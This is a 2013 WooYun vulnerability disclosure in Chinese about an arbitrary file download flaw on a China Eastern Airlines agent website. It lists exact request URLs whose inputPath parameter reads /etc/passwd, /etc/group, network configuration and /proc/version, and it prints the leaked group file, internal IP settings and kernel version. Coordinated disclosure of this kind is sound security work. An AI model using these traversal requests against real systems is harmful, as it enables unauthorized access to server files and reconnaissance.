当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040171

漏洞标题:东方航空某站文件遍历导致重要系统被下载

相关厂商:中国东方航空股份有限公司

漏洞作者: 霍大然

提交时间:2013-10-18 13:25

修复时间:2013-12-02 13:26

公开时间:2013-12-02 13:26

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-28: 细节向核心白帽子及相关领域专家公开
2013-11-07: 细节向普通白帽子公开
2013-11-17: 细节向实习白帽子公开
2013-12-02: 细节向公众公开

简要描述:

东方航空某站文件遍历导致重要系统被下载

详细说明:

问题站点:
http://ceagent.ceair.com/

1.jpg


一、passwd文件
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd

1-1.jpg


好多用户啊;
二、sysctl
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf

1-2.jpg


三、group
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
lock:x:54:
nobody:x:99:
users:x:100:
nscd:x:28:
floppy:x:19:
vcsa:x:69:
pcap:x:77:
utmp:x:22:
utempter:x:35:
slocate:x:21:
rpc:x:32:
mailnull:x:47:
smmsp:x:51:
rpcuser:x:29:
nfsnobody:x:4294967294:
sshd:x:74:
dbus:x:81:
haldaemon:x:68:
avahi-autoipd:x:101:
avahi:x:70:
apache:x:48:
ntp:x:38:
xfs:x:43:
gdm:x:42:
sabayon:x:86:
stapdev:x:102:
stapusr:x:103:
hw:x:500:
was:x:403:was7
wl:x:105:
ot:x:201:
os:x:203:
bk:x:205:
rd:x:206:
et:x:207:
cs:x:208:
ap:x:209:
nw:x:211:
tux:x:401:
mqm:x:402:
uni:x:111:
rduser:x:501:
op:x:212:
td:x:213:
jboss:x:214:
hexuan:x:12071:
lixue:x:10053:
zhangjin:x:12076:
四、网络信息:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
USERCTL=no
BOOTPROTO=static
NETMASK=255.255.255.0
IPADDR=10.6.141.90
PEERDNS=yes
check_link_down() {
return 1;
}
五、services
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/services

1-3.jpg

漏洞证明:

http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/proc/version
Linux version 2.6.18-128.el5 (mockbuild@hs20-bc1-7.build.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-44)) #1 SMP Wed Dec 17 11:41:38 EST 2008

修复方案:

对问题参数过滤

版权声明:转载请注明来源 霍大然@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-10-18 16:50

厂商回复:

十分感谢。

最新状态:

2013-10-21:已修复。

漏洞评价:

评论

  1. 2013-10-18 14:27 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @疯狗 @xsser 刚才还在首页,怎么一转眼的功夫就变成小漏洞了